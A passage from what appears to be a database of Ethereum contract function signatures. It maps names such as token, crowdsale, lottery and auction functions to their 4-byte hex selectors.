"totalAmountOfEarlyPurchases()": "0xd7a14a05", "numOfPurchasedTokensOnEpBy(address)": "0x4d730d51", "numOfPurchasedTokensOnCsBy(address)": "0x7a960154", "totalRaisedAmountInCny()": "0x48538112", "endedAt()": "0x3d6a71e4", "allocateToMarketingSupporter(address,uint256)": "0x202b876a", "allocateToCrowdsalePurchaser(address,uint256)": "0x0ef5a7e0", "company()": "0x6904c94d", "isFundraiser(address)": "0x7f7977d1", "setAddressArr(address[])": "0x8e37adec", "AicToken()": "0x6d8c3912", "BasicToken()": "0x5d552c72", "RPNCoin()": "0x6e0763f3", "changeEtherPrice(uint256)": "0x94679ce7", "KeplerTokenCrowdsale(uint256,address,address)": "0x31447a32", "logGive(address,string)": "0xbf8e0ea4", "getBoosterRaiseValue(uint256)": "0x0f8ef9f8", "getBoosterStrength(uint256)": "0x1027e242", "getBoosterDuration(uint256)": "0xe2a9ba05", "getBoosterAmount(uint256)": "0x0f99da4a", "getBoosterType(uint256)": "0x65113528", "setChests(address)": "0xe6207611", "setFishbank(address)": "0xee245b53", "mintBooster(address,uint32,uint8,uint8,uint32,uint24)": "0x262bcb68", "FishbankBoosters()": "0x8611e330", "ClipperCoin(uint256,string,string)": "0xc77684f9", "Clip()": "0xa71be2c0", "NeLunaCoin()": "0xa91f559d", "CLBToken()": "0xe4662939", "getWord()": "0xed40a8c8", "REDGIL()": "0x2b8b09d4", "isDecentBetCrowdsale()": "0xa95ff7d5", "allocateTokens(address,address,uint256)": "0x16448c99", "addToCommunitySaleWhitelist(address[])": "0xe244fe89", "addToPreSaleWhitelist(address,address)": "0xaa4eaa72", "getTokensAtCurrentRate(uint256)": "0x0fb9dcd5", "updateBaseTokensPerEther(uint256)": "0xda88a831", "DecentBetToken(address,address,address,uint256,uint256,uint256)": "0x41910112", "DecentBetVault(address)": "0xb87e64ce", "setOriginalSupply()": "0x9ef916ab", "finalizeUpgrade()": "0x9a508c8e", "fixPlayerGraphic(uint256,string)": "0x21ab9177", "fixPlayerFlag(uint256,string)": "0x2db6e0fe", "fixPlayerSurname(uint256,string)": "0xe8ba8f8b", "fixPlayerMiddlename(uint256,string)": "0xfdcea342", "fixPlayerPrename(uint256,string)": "0x061307b0", "fixPlayerCountryString(uint256,string)": "0x27de1fc9", "fixPlayerCountryId(uint256,uint256)": "0xf9778d0d", "fixPlayerID(uint256,uint256)": "0x828f717c", "isAlreadyUser(address,address)": "0x3659887c", "createNewUser(address,address,string)": "0x693391fe", "numberOfTokensOfOwner(address)": "0x3ef8e872", "adjustAddressWealthOnSale(uint256,address,address,uint256)": "0x98019a41", "getWealthOfUser(address,address)": "0x2f7981c2", "getIDMapping(uint256,uint256)": "0xfad4e1f2", "getUniqueIdOfPlayerByPlayerAndCountryID(uint256)": "0x4d7d13e1", "getUserIDByWallet(address)": "0xca819d35", "getUserNameByWallet(address)": "0xae014f1d", "getUserWalletByID(uint256)": "0x02a2680c", "getUserByID(uint256)": "0x6d3b5f18", "getLeaderBoardData(address)": "0xe927f1f9", "calcNetworkFee(uint256)": "0x43a4344f", "getPlayerBackDataForMarketPlaceCards(uint256)": "0x57650592", "getPlayerFrontDataForMarketPlaceCards(uint256)": "0x2e87b461", "isUserBlacklisted(address,address)": "0xc6548076", "addMappingForPlayerIDs(uint256,uint256,uint256)": "0xc883d3fa", "addPlayerData(uint256,uint256,string,uint256,uint64,uint64,uint64)": "0xbd763f59", "adjustPriceAndOwnerOfPlayerDuringPresale(uint256,address,uint256)": "0x665289d2", "adjustPriceOfCountryPlayersAfterWin(uint256)": "0xbc2017f3", "deletePlayer(uint256)": "0x7059194e", "createPlayer(uint256,uint256,string,string,string,string,string,string,address,uint256)": "0x7040bcc9", "deleteUser(address,address)": "0xc19a8095", "blackListUser(address,address)": "0xa057dade", "CoinFuns()": "0x23c79ab3", "freezeAll()": "0x99464c89", "reconfig(string,string)": "0x1bc390dd", "myBalance()": "0xc9116b69", "totalSupplyWithZeroAddress()": "0x911a56bc", "KayiToken()": "0xa6cea881", "XPTToken()": "0x7174164b", "_deliverPack(address,uint8)": "0x07632269", "multiBlockRandomGen(uint256,uint256)": "0x41fa4876", "changeHouseedge(uint8)": "0xd7a58658", "returnAll()": "0x85b1423e", "payout(uint256)": "0xe1152343", "lockBet(uint256)": "0x940c154b", "CSGOBets()": "0x61472fd4", "ZeroPonzi()": "0x06900c41", "ConsultingHalf(address,address)": "0x51a5f2f2", "Consulting(address,address)": "0x791b51f1", "calculateROI()": "0xcde99727", "getDay()": "0x14ba5c09", "found()": "0x3d750b28", "SmartRevshare()": "0xa49d53a1", "setOfficialWebsite(string)": "0xb3a2a6c0", "Managed()": "0xa20495d3", "EthVentures()": "0x8112821f", "calcCostsSelling(uint256,uint8,uint8,uint256)": "0x6111dd02", "calcCostsBuying(uint256,uint8,uint8,uint256)": "0x550dd006", "getShareRange(uint256,uint8)": "0x7ef1925b", "sellShares(uint256,uint8,uint256,uint256)": "0x590528a9", "buyShares(uint256,uint8,uint256,uint256)": "0x3f887fad", "closeMarketMaker(uint256)": "0xc7489441", "createMarketMaker(uint256,uint16,uint256)": "0x968908a3", "createEventAndMarketMaker(uint256,uint256,uint8,uint32,address,uint256,uint8,uint16,uint256)": "0x1335ff36", "redeemWinnings(uint256)": "0xd7ed7453", "sendShares(uint256,uint8,uint256,address)": "0x154af6b1", "redeemAllOutcomes(uint256,uint256)": "0x4757f1d2", "buyAllOutcomes(uint256,uint256)": "0x7a29332d", "createEvent(uint256,uint256,uint8,uint32,address,uint256,uint8)": "0xff49b26e", "getShareDistribution(uint256)": "0x76abc03b", "getShares(uint256[128])": "0x90e3c278", "getMarkets(uint256[128])": "0xb2c652f3", "getEventHashes(uint256[256])": "0xcdd13701", "deleteContract()": "0x5a58cd4c", "changeCreator(address)": "0x74580e2f", "MarketsContract()": "0xabebb7f3", "getWinningOutcome(uint256)": "0x084d72f4", "ln(uint256)": "0x24d4e90a", "e_exp(uint256)": "0x4b09ebb2", "setFeeRate(uint256)": "0x45596e2e", "setMinDeposit(uint256)": "0x8fcc9cfb", "SimpleDice()": "0x9f7f760c", "ManualDeposit()": "0x112c7075", "NewManualInvestor(address,uint256)": "0x4cd11943", "NewMessage(string)": "0x476e04c7", "EmergencyBalanceReset(uint256)": "0x611daa7e", "Emergency()": "0x6b1781b6", "NewOwner(address)": "0x3edd90e7", "Enter()": "0x1097e579", "EthVenturesFinal()": "0x9a92b7e7", "grindUnicorns(uint256)": "0x4ae85627", "sqrt(uint256)": "0x677342ce", "changeMeatProvider(address)": "0xeb08b304", "changeVotingRules(address,address,uint256,uint256,uint256)": "0x5938748e", "MeatGrindersAssociation(address,address,uint256,uint256,uint256,address)": "0xb8d3bfe3", "calculateMeat(uint256)": "0xbff0fbb8", "signRelease(uint256)": "0xa66f7ad6", "holdCoin(address,address)": "0x7d619d9b", "moneySumAtSettlement(address,uint256,int256,uint256)": "0x209a5b8a", "getMaxLossAfterTrade(address,uint256,int256,int256)": "0x17c65aa7", "orderMatch(uint256,uint256,int256,uint256,uint256,address,uint8,bytes,bytes,int256)": "0x6663bbec", "orderMatchTest(uint256,uint256,int256,uint256,uint256,address,address,uint256,int256)": "0xc6cb7a96", "getMoneyness(int256,uint256,uint256)": "0xec0b4153", "expire(uint256,uint8,bytes,bytes,bytes)": "0xc398f030", "getMarket(address)": "0xd4dfadbf", "getOptionChain()": "0x756fb8c9", "getMarketMakerFunds()": "0x0e1087c3", "getMarketMakers()": "0x2043285d", "marketMaker(string)": "0x502414e4", "getFundsAndAvailable(address)": "0xd5544f94", "getFunds(address,bool)": "0x5c665f89", "withdrawFunds(uint256)": "0x155dd5ee", "addFunds()": "0xa26759cb", "getAccount(uint256)": "0xce88b145", "getAccountID(address)": "0x7c7c7695", "Etheropt(uint256,string,uint256,uint256,bytes,address,int256[])": "0x0a7493b4", "NiceGuyTax()": "0x6617e11a", "allocate(address,uint256)": "0xb78b52df", "distribute()": "0xe4fc6b6d", "toWei(uint256)": "0x669dafe8", "approve(address,uint256,bytes)": "0x5c17f9f4", "transferFrom(address,address,uint256,bytes)": "0xab67aa58", "allowance(address,address,bytes)": "0x5fd9dff6", "balanceOf(address,bytes)": "0x8606f905", "totalSupply(bytes)": "0x2a0d79ef", "tryGet(bytes)": "0x804ba97a", "unset(bytes)": "0x24a852c6", "FailGuyTax()": "0xbf32bf97", "CreateNewDraw(uint256,bytes)": "0xc1e5304a", "AdminGetFee()": "0xb6294bde", "AdminAddFunds()": "0x3fa6497f", "AdminCloseContract()": "0x0acf473b", "AdminSetDrawer(address)": "0x370b6939", "AdminStartDraw(string,bytes)": "0xe26c8434", "AdminDrawError()": "0xd96de4ce", "AdminDrawProcess()": "0x3e0663e0", "UserAddTicket(bytes)": "0x2b291eb6", "UserGetPrize()": "0x78e80b39", "cEthereumlotteryNet(bytes)": "0x53b7b2e9", "UserCheckBalance(address)": "0x7bc25372", "YUPIE_PER_ETH_SALE()": "0xb1e2e28c", "updateUSeqIndex()": "0x4f67498e", "cVideoCost()": "0x6b1786bb", "erotixFundMultiplier()": "0x08956746", "deathData_v3()": "0xa40a485f", "transferStatus()": "0xf4880b22", "price_constant1()": "0x5477d33f", "market2020TokenCreated()": "0x7c69ef8d", "leadingGang()": "0x47e74409", "activeShareholdersArrayLength()": "0x7c21ae12", "etherCost()": "0x7b6a912c", "liquidationPeriod()": "0xa6eea7f3", "oneEtherInKicks()": "0x30acd249", "maxTiers()": "0x7d6bc260", "subFundBalance()": "0x96d002a0", "preSaleBonus2Time()": "0x3c391c95", "contractInitializationTime()": "0x67bd15e3", "presalecap()": "0x4de261ef", "triggerFindWinner()": "0xa293688b", "trancheAmountPct()": "0x45f11fc8", "sealdate()": "0x47f7af67", "currentGameStatus()": "0x7f102c16", "setData()": "0xf31604c7", "ETH_address()": "0x35a9d051", "key()": "0x3943380c", "isFirstInit()": "0x44b1e61a", "xmasFundWallet()": "0x431ab1f2", "ICOpaused()": "0xb7ee2552", "DateOfDeath()": "0x54d4b7b2", "memberBuyToken()": "0xcf58a045", "totalMaxBuyin()": "0x75556e32", "totalTRsWon()": "0xed8fe3c1", "saiVox()": "0x071c802b", "raisedETH()": "0x2a486a28", "TRANSFERS_ALLOWED()": "0x75a75ba9", "privateAmount()": "0x546dd883", "lifeVestingStages()": "0x3f8cfba6", "migrating()": "0x4956cf1c", "ZitronSupply()": "0xe7acb2b4", "onceoutTimePer()": "0x4f556b23", "payerString()": "0x1194ed46", "emissionPrice()": "0xb15651ff", "proposalDestination()": "0x3e8a9439", "MINBET_perSPIN()": "0x5e9a31fb", "affiliateList()": "0x14eba5d8", "executePure()": "0x409315ce", "tokenId()": "0x17d70f7c", "preIcoTotalSupply()": "0xef7c9ecd", "isMultiply()": "0x69e936f0", "bucketManager()": "0x8a098cd7", "divCutMaster()": "0x84313086", "ICO_LEVEL_5()": "0xb1fc0792", "ICO_MAX_CAP()": "0xbae99efc", "totalAllocatedPurchase()": "0x84e700ee", "endPeriodC()": "0x0f81d248", "generateDepositAddress()": "0x0ff39daa", "worstCaseRateFactorInBps()": "0x9bc72d5f", "stakeVoted_Eth()": "0x6113611f", "houseCommission()": "0x7603b02d", "deathData_v15()": "0x9f591fa5", "maker()": "0x50655d8c", "MINIMUM_MANUAL_SIGN_PERIOD()": "0x2b0fdb72", "familyContract()": "0xe01fff13", "activateNextStage()": "0x1ff858d0", "ARIWallet()": "0xe2c8f7c8", "balanceTotal()": "0x42b8c415", "airdropNum1()": "0x1e3faf22", "walletEtherPresale()": "0xbc56a240", "crowdSaleStartTime()": "0xaf6c7f77", "aboutCurrentPack()": "0xd89fec58", "end_block()": "0x5e0b1259", "wei_per_token()": "0x1226f5f8", "baseSupply()": "0x860f5048", "round3Bonus()": "0x7f1482b1", "sxpNumber()": "0x78f55de4", "PushData()": "0x1be863bf", "transferWhiteList()": "0x1875aa22", "firstPeriodEndDate()": "0xb9653382", "totalFish()": "0x62b26f95", "_rate()": "0x83bebced", "DIVIDEND_FUND_FRAC_BOT()": "0xb74e825e", "afterFirstRefundRoundFundsReleaseNumerator()": "0x2b0d0c6a", "ratePre()": "0x896147e1", "from()": "0xd5ce3389", "createTokenToTax()": "0x9d2754a9", "refund_eth_value()": "0x88908546", "RESERVED_TOKENS_FOR_FURTHER_TECH_DEVELOPMENT()": "0xd2fa9a67", "isPreIcoFinish()": "0xa993772f", "goldenTokenId()": "0xb916e5d0", "basicPricePerEth()": "0x6e5b064c", "lockedUntil()": "0xce0617ec", "poolBounty()": "0x0caab83a", "_airdropSupply()": "0x742e54b2", "exchangeThreshold()": "0x49b40402", "limit9()": "0xbb6af3da", "getFreeBalances()": "0x2c1f1f8f", "secondReserveTimeLock()": "0xdc32c72f", "untsqm()": "0x4314162d", "pendingEthWithdrawal()": "0x2c0a7e33", "hardCapIco()": "0x5e58217d", "backTransfer(address,uint256)": "0x6973a4f8", "backToken(address,uint256)": "0xde94b800", "EPVToken()": "0x42c74c73", "ERC20(uint256)": "0x6181fb0a", "LaxmiCoin(uint256,string,uint8,string)": "0x0965fd36", "CoInsureBlockToken()": "0x6c5bde2a", "ALM()": "0x36400cd2", "ViewProjects()": "0xca0e5c27", "PLN_Omnidollar()": "0xb790301a", "ENCSToken(uint256,string,uint8,string)": "0x043d5f1a", "GoldToken(address)": "0xff27848a", "confirmNewNotary(address)": "0x5af0649e", "proposeNewNotary(address)": "0x1649d72b", "confirmNewOwner(address)": "0xb51d93eb", "confirmBurning(uint256)": "0xe7b9db8d", "proposeBurning(uint256)": "0x83fb42ba", "confirmMinting(uint256)": "0x0c402ed8", "proposeMinting(uint256)": "0x744c7c7f", "MultiSigMint(address)": "0xd33cf9fa", "getIIPTotalSupply()": "0x2433f617", "IIPToken(uint256)": "0xb845b51e", "Sponsor()": "0xa9e94aa2", "Cancel()": "0x4aa8e773", "IEFBR14()": "0x5b485314", "IEFBR14Contract()": "0x11717501", "Klassicoin()": "0xb64c154a", "GlowEther()": "0x37e58bd8", "ResidualShare(uint256,string,string)": "0xc4d42292", "DrepToken()": "0x3d6a2231", "Sell(uint256)": "0x52288195", "Shark()": "0xe412828a", "Trade(uint256,uint256,bytes32,address,address)": "0x39a12c3b", "AhieldCureToken()": "0x9cc2bcc6", "Y2_release()": "0xcc8a86a0", "Y1_release()": "0x2908fb5a", "setSalePeriod(uint256,uint256)": "0xba1c3b92", "unsetVipAddress(address,address)": "0x6f3bb97f", "setVipAddress(address,address)": "0x6c1c6d93", "setVipRate(uint256)": "0x8fd4f899", "OAKTokenCrowdsale(uint256,uint256,uint256,address)": "0x1089843c", "forwardable(address)": "0x66188a26", "getTx(address,uint256)": "0x741a35c4", "investmentRefunded(address)": "0x170eeb0f", "setAuthorized(address)": "0x14fc2812", "MHCBC()": "0xe4aa6c5c", "DukevsKansas()": "0xbfc6cdd1", "ExeniumToken()": "0x0d8fd836", "AtraToken()": "0x97aeecd0", "transferAfterDeadline()": "0x52507790", "zero_fee_transaction(address,address,uint256)": "0x6d081d83", "SoarCoin()": "0x958e0028", "EPTest()": "0x6455cb97", "addTwinAddress(address)": "0xa6d7d72e", "LEXT()": "0xe32ecd18", "checkReleaseAmount(address)": "0x74ae26f7", "setReleaseAmount(address,uint256)": "0xa2de29d4", "checkBlackAccount(address)": "0xcbbb2698", "clearBlackAccount(address)": "0x22c83245", "addBlackAccount(address)": "0x31d42bf2", "_removePlayer(uint256,uint256)": "0x26637579", "_addOwnerPlayerToTeam(uint256,address,uint256,uint256)": "0x2ee6fe55", "setCountPlayersInPosition(uint256)": "0xeb60e2c7", "getAllTeamsIds()": "0xb8661e2d", "setLogo(uint256,string)": "0x84298882", "ownerSetjackpotContract(address)": "0xfff311b1", "ownerSetRecommendProportion(uint256)": "0xf0f0fe10", "ownerSetJackpotOfHouseEdge(uint256)": "0x90014f06", "OwnerSetPrizePool(address)": "0x9ed7772c", "getHouseEdgeAmount(uint256,uint256)": "0x37638119", "getDiceWinAmount(uint256,uint256)": "0xb89503f3", "oddEven(uint256,address)": "0xc94d0eee", "playerRoll(uint256,uint256,address)": "0xf679791d", "ICSTCrowSale()": "0xfa52bcb3", "TreePlusToken()": "0x3e0aedaf", "NucleusVisionToken()": "0x876b0946", "revokeBalance(address,address,address)": "0xc71ba100", "batchAirDrop(address,address,address[],uint256)": "0x3f497d52", "NucleusVisionAirDrop()": "0xcf51f582", "CredoIco(address,uint256,uint256)": "0xd59fde06", "setTeamWalletAddress(address)": "0x2c4b2334", "mintTokenForPrivateInvestors(address,uint256)": "0x18a54ecd", "ICNQCrowdsale(uint256,uint256,uint256,address,uint256,address)": "0x58491ad9", "SCPS1Token()": "0x6e97041e", "KRYPT()": "0xf767fdcf", "AlbertCoin()": "0x9921cac5", "Bitgram()": "0xecf6f2f8", "SimpleLife()": "0x3f8f0714", "ZigZagToken()": "0x9e6031c6", "nameOf(uint256,address)": "0x0133db3a", "LBCoinJ()": "0x2d24447a", "LBCoinJ(string,string,uint256)": "0xbaa70a8b", "OnliCoinToken()": "0xcd586a50", "ShishuToken(uint256,string,string)": "0x946ba496", "MIPCoinToken()": "0xda67ac42", "freezeTransfersUntil(uint256)": "0xbc01b767", "OrmeCash()": "0xfc335bb5", "sendToBeneficiary()": "0x53e68720", "runCrowdsale()": "0xcfec934a", "AsiaPropertyCoin()": "0x3a9214d2", "BCN()": "0x9cfdd04d", "wait()": "0x64bd7013", "buyer_profit_pool_amount()": "0x4ddd648b", "whitelistFilteringSwitch()": "0x3f3cde05", "bonusEnds()": "0x40c65003", "Angel()": "0x1d2ee278", "DEV_TEAM_HOLDER()": "0x1ca4399b", "prcntRate()": "0x762ced87", "maxAssignedRequests()": "0xf773a3fb", "nextGameId()": "0xb135bbb0", "toSaleWallet()": "0x12407f98", "coinsLeftInTier()": "0xa6d15124", "startBalance()": "0x2bb9ffef", "tittyContractAddress()": "0x824f0f7e", "startMintingDate()": "0xeb39f443", "mainSaleRateP2()": "0xda3fb6f7", "totalWeiFunded()": "0xd9296e45", "priceIncreasingRatio()": "0xe19bb964", "Frozen()": "0xa8cab3d1", "ico3Sold()": "0x6c1f2fb3", "potAddup()": "0xa9fb11b3", "Info()": "0x4012e02e", "EARLY_CONTRIBUTION_DURATION()": "0x67198207", "PrivateSaleEndTime()": "0x7d42af97", "sencEthRate()": "0x0ab21db7", "waittokens()": "0x325dfddf", "tokenTimelockAddress()": "0x9cb4b31c", "maxCapMintTransfer()": "0xc88fe1fa", "devCATDestination()": "0x687f8427", "mainSaleEndTime()": "0x2846a35b", "soldIdeaWeiPreIco()": "0x667cb72d", "WHEEL_SIZE()": "0x379930f7", "enterGame()": "0x218bd577", "holyFoundersFundDeposit()": "0x7a30ebed", "unholdDate()": "0xef084006", "masterRecruitment()": "0x60af9f91", "getDutchAuctionToCraftAddress()": "0x11f0b806", "allSupply()": "0x42320732", "changeFee()": "0x0040ff6c", "getDutchAuctionToBuyAddress()": "0x3c0ba651", "totalMaxBuy()": "0x76e93db5", "openWormhole()": "0xb1e8cca8", "wasSaleStarted()": "0x808fc72c", "priceToken()": "0x2ff6fe76", "OWNER_POOL_COMMISSION()": "0x8f6b875a", "ClaimedAmount()": "0x06f33115", "count_token_holders()": "0x23b7fc86", "bountyAdress()": "0x733261bf", "destroyedToken()": "0x4d42c952", "ethOdinRate1()": "0xe172dac8", "CLIForGas()": "0x2d5b2e15", "salesTokenHolder()": "0x95f28272", "tokenRemainPreSale()": "0xe4e85963", "claimCompanyTokens()": "0xb7e621c3", "icoPhase3End()": "0x6251aee6", "ALLOC_FOUNDATION()": "0x553fd8ee", "balance_available_for_custom_voting()": "0x9f51cf67", "starToken()": "0xb7ca51e8", "AddrDevelopGroup()": "0x1f6d3d13", "publicToken()": "0x4ee3dc91", "resetPeriod()": "0x944c1d97", "Crowd()": "0x6c1ff101", "currentTierIndex()": "0x1ea92826", "crowdsaleSucceeded()": "0x9a4fd88d", "numberOfPartitions()": "0xfe4cee66", "theRiver()": "0x57f86b6a", "REKTMultiSigWallet()": "0xf358b3de", "ico_starting_supply()": "0xef4a0c61", "scannedSilverCaps()": "0x78ec0adf", "heapSort(uint32[])": "0x8cae59dd", "lastBlock_v6()": "0x2e9066b2", "tgeSettingsMaxStages()": "0xaac1335c", "advisorsVesting()": "0x3f5cd055", "tokenSaleLimit()": "0x6013d092", "advisersAddr()": "0x9ba3c2e0", "startBlockBonus()": "0x487260bb", "BETS_CLOSING_TIME()": "0x5ef3f9e1", "maxWeiSMSVerified()": "0xf9a86856", "canBuyLimit()": "0x770b210e", "overflow_upper()": "0x0b6d3017", "sentTokensToFounder()": "0x9ad4eccf", "totalTokensGenerated()": "0x01bc9533", "currentRoundNum()": "0x98e25733", "gameOverByUser()": "0xa66b62e6", "unholdTeamTokens()": "0x49c71fa8", "remainingTokenBurnt()": "0xcb2fe520", "SALES_DEADLINE()": "0x0db6a786", "bonussale_WeiRaised()": "0x4fac9c65", "setSoftCapReached()": "0x3d493572", "sendTokensBackToWallet()": "0x5e511afa", "AddrMarketing()": "0x8c9924d5", "period3Numerator()": "0x1af5205c", "isLimitReached()": "0x5d19a99f", "releasedMarketingTokens()": "0xfeaed589", "SaleEnded()": "0x0bd8a3eb", "stageDuration()": "0xaafb088e", "RedeemingTimeLimit()": "0xcfa86845", "phase_4_Time()": "0xdea5de80", "isPayable()": "0xce46e046", "CPGPEREGRINE_MAX_CARGO()": "0xd25f1c35", "bonusSecondWeekPeriod()": "0x9b08ace1", "IOCFundIndex()": "0xe10eda7a", "restore(uint256)": "0x9bea62ad", "save(uint256)": "0x1b862027", "setMinimumPayout(uint256)": "0x59695754", "_setPrices(uint256)": "0xa6f6a8a6", "_newPrice(uint256)": "0x997a0229", "allowTransferOwnership(bool)": "0xc7bdbb95", "grantVested(address,address)": "0xe8777158", "calcAmount(uint256,uint256)": "0x7133c0c0", "ADXToken(address,address,uint256,uint256,uint256,address,uint256,address,uint256,address,uint256)": "0x894cdcc1", "isCrowdfundCompleted()": "0xab1a84da", "_createPrecious(address,uint256,string)": "0x2d81844e", "_createEdition(string,uint256,uint256)": "0x364e0af3", "_createCollection(string)": "0xb4e3add2", "setCresus(address)": "0x15ab250d", "setDaVinci(address)": "0x3d5bb7f4", "getCollection(uint256)": "0x5a1f3c28", "getEdition(uint256)": "0xa642c032", "getPrecious(uint256)": "0x771feb74", "createContractPreciousForEdition(address,uint256,string)": "0x30f12642", "createContractEditionForCollection(string,uint256,uint256)": "0x37375a43", "createContractCollection(string)": "0x789e4e53", "HiPrecious()": "0x427b59d3", "tokenUri(uint256)": "0x1675f455", "airDrop(address,address,uint256)": "0x32c0fba5", "takeFee(uint32)": "0x6e3e1318", "checkWinNobody(uint32)": "0x62dd9c71", "resolveLotteryByHand(uint32,uint32)": "0x72b81b1c", "resolveLotteryByOraclize(uint32,uint32)": "0x73f1e6d7", "cancelLottery(uint32)": "0x11ac20c0", "redeemToken(uint256,uint32)": "0x77a9e152", "buyToken(uint32,uint32,uint32,address)": "0xc0e1e272", "setOwnerAirDropRate(uint32)": "0x7461dbff", "setUserAirDropRate(uint32)": "0x2ece07c3", "addLottery(string,uint32,uint32,uint32,uint32,uint32,uint32)": "0x874d73a7", "freezeLottery(uint32,bool)": "0x56f99fcb", "setOraclizeGasPrice(uint256,uint256)": "0x40adf94e", "TTGOracle()": "0x727da487", "getStatLotteries()": "0xe4e663a9", "getUserTokensByMatch(address,uint32)": "0xaec651fb", "getUserTokens(address,uint32)": "0x8cc57368", "getTokenByID(uint256)": "0x087205f0", "getSumInByLottery(uint32)": "0x69f6b766", "getCountTokensByLottery(uint32)": "0xa93e4044", "getLotteryByID(uint32)": "0xbe60988e", "setItemToken(address)": "0xac0496e1", "setTTGCoin(address)": "0x6336ac19", "timenow()": "0x3fae1928", "_processGameEnd()": "0x6c226eef", "setNextGame(uint256,uint256,uint256,uint256)": "0xc3332732", "topUp(string)": "0x09cc5551", "JackpotCore(uint256,uint256,uint256,uint256)": "0xf19be5d5", "withdrawFreeBalance()": "0xee8b39f6", "_sendFunds(address,uint256)": "0x4f81b930", "setGameStarterDividendPercentage(uint256)": "0x15334b77", "calculateTimeout()": "0xcd5ebd93", "JackpotAccessControl()": "0x38d65020", "sendDividends(address,uint256)": "0x2c642f51", "pushDividends(address)": "0xdcb951de", "setGasUsage(uint256)": "0x7c796a83", "ESlotsToken()": "0x4aba76a3", "connectCrowdsaleContract(address)": "0x4e3673a6", "completeICO()": "0x49e4347b", "maxTokensToSale()": "0x3d316134", "claimDividends()": "0x668038e0", "dividendsAmount(address)": "0xcbf4531d", "getTotalUnPayedDividendsAmount()": "0xdc97a4f9", "getTotalDividendsRounds()": "0x18ecc6f4", "getTotalDividendsAmount()": "0xa991faf9", "transferby(address,uint256)": "0x91c259ea", "fixSpecications(bool)": "0xc21c5ee1", "end_ICO()": "0x02c3d7f6", "releaseICO()": "0x124d3396", "StopICO()": "0x3dbedbd4", "start_ICO()": "0x807d2da3", "start_PREICO()": "0x405df338", "bonuscalpre()": "0x0ea008c8", "TANDER()": "0x9635024c", "Ixellion()": "0x90f1d909", "AuPetitCoinToken()": "0x3314b62d", "MLCToken()": "0x7f853e7e", "MoonDustDividends()": "0xff02326f", "getBuyRate()": "0x3d35d7ba", "ParcelXToken(address[],uint256)": "0x2810dd4a", "isPause()": "0xff0938a7", "checkAndConfirm(address,bytes32)": "0x410e8340", "MultiOwnable(address[],uint256)": "0x70c690f4", "convertMainchainGPX(string,string)": "0x78683654", "BEXToken()": "0x16e1286d", "burn(uint256,uint256)": "0xb390c0ab", "ediv(uint256,uint256)": "0x159d8562", "forceNeuroChainAddress(address,string)": "0x6cb04993", "setNeuroChainAddress(string)": "0x42565405", "setTradingStatus(bool)": "0x379ba1d9", "allowFreezeBypass(address)": "0x0dc6bae5", "distributeSupply(address,uint256)": "0x44bee639", "setCanBuy(bool)": "0x2c06862b", "disableMintForever()": "0xf2f70594", "MiningRigRentalsToken()": "0xabb4fe2d", "CentraWhiteList()": "0x0df9d568", "MorpheusToken()": "0x8ecebf34", "CMAPToken()": "0x6c922038", "mintRawTokens(address,uint256)": "0x2b0cb194", "setNewBonusScheme(uint256)": "0x990ed905", "BETHERTokenSale(uint256,address)": "0x0bca441b", "BethereumERC223()": "0x239f26ee", "FXPay()": "0x9a4e9bff", "AiBank()": "0xc3b91d15", "BetherCryptocurrency()": "0x21c6b951", "KoreaRepublicvsGermany()": "0xabce03d0", "SemainToken()": "0x9ae6cac7", "decreaseWeiRaised(uint256)": "0x0698ac9b", "increaseWeiRaised(uint256)": "0xbbbf8fbd", "delayIcoEnd(uint256)": "0x2f26b5d1", "IHCToken(uint256,string,string)": "0x89113858", "AICQ()": "0x71e365a0", "burnMe()": "0xca879753", "claimTokensFromSeveralAuctionsAsBuyer(address[],address[],uint256[],address)": "0xd3cc8d1c", "claimTokensFromSeveralAuctionsAsSeller(address[],address[],uint256[],address)": "0x7895dd21", "getApprovedAddressesOfList(address[],address)": "0xbd1b768b", "getBuyerBalancesOfCurrentAuctions(address[],address[],address)": "0xbc88adc4", "getIndicesWithClaimableTokensForBuyers(address,address,address,uint256)": "0xd3062b24", "getSellerBalancesOfCurrentAuctions(address[],address[],address)": "0x01a521d6", "getIndicesWithClaimableTokensForSellers(address,address,address,uint256)": "0xf97ea6fc", "getRunningTokenPairs(address[])": "0x84429579", "atleastZero(int256)": "0x30690468", "getAuctionIndex(address,address)": "0x14584a9d", "setAuctionIndex(address,address)": "0x0fee32bb", "getAuctionStart(address,address)": "0xdae595e5", "resetAuctionStart(address,address)": "0x9d707d03", "setAuctionStart(address,address,uint256)": "0x54192046", "getTokenOrder(address,address)": "0x00599e65", "claimAndWithdraw(address,address,address,uint256,uint256)": "0x06d58f2a", "depositAndSell(address,address,uint256)": "0x657a37ad", "getCurrentAuctionPrice(address,address,uint256)": "0xfdab1b7b", "getPriceOfTokenInLastAuction(address)": "0xf41d97fc", "getPriceInPastAuction(address,address,uint256)": "0x4bf8e7a2", "scheduleNextAuction(address,address)": "0x19a51554", "clearAuction(address,address,uint256,uint256)": "0xae2bd2bd", "getFeeRatio(address)": "0xedd0b5cb", "settleFeeSecondPart(address,uint256)": "0xad7fa43c", "settleFee(address,address,uint256,uint256)": "0x2e05b37b", "getUnclaimedBuyerFunds(address,address,address,uint256)": "0xdf6af7d1", "closeTheoreticalClosedAuction(address,address,uint256)": "0x821b98f3", "issueFrts(address,address,uint256,uint256,uint256,address)": "0x5afc7e59", "claimBuyerFunds(address,address,address,uint256)": "0xb0293850", "claimSellerFunds(address,address,address,uint256)": "0x65054e55", "postBuyOrder(address,address,uint256,uint256)": "0x5e7f22c2", "postSellOrder(address,address,uint256,uint256)": "0x59f96ae5", "addTokenPairSecondPart(address,address,uint256,uint256)": "0x07b1be24", "calculateFundedValueTokenToken(address,address,uint256,uint256,address,uint256)": "0xca7c9296", "addTokenPair(address,address,uint256,uint256,uint256,uint256)": "0xe9f8cd70", "updateApprovalOfToken(address[],bool)": "0x65b0d711", "updateThresholdNewAuction(uint256)": "0xc6af43f9", "updateThresholdNewTokenPair(uint256)": "0xe1c95bb9", "updateEthUSDOracle()": "0xf4279d1f", "updateAuctioneer(address)": "0x796a8076", "withdrawUnlockedTokens()": "0xc17ccc6c", "unlockTokens(uint256)": "0x7c405325", "updateMinter(address)": "0x4eb03f6e", "TokenFRT(address)": "0xfcde7b69", "getUSDETHPrice()": "0xa3ca17b2", "updateCurator(address)": "0x0c6a62dd", "raiseEmergency(bool)": "0x9e385fa4", "PriceOracleInterface(address,address)": "0x206d468f", "SMCT()": "0x0aa1ae29", "Etros()": "0x6a9b4daf", "EVM()": "0xd9dc7fcd", "InToken()": "0x58d213ae", "InbotToken(string,string,uint8)": "0x5806ba15", 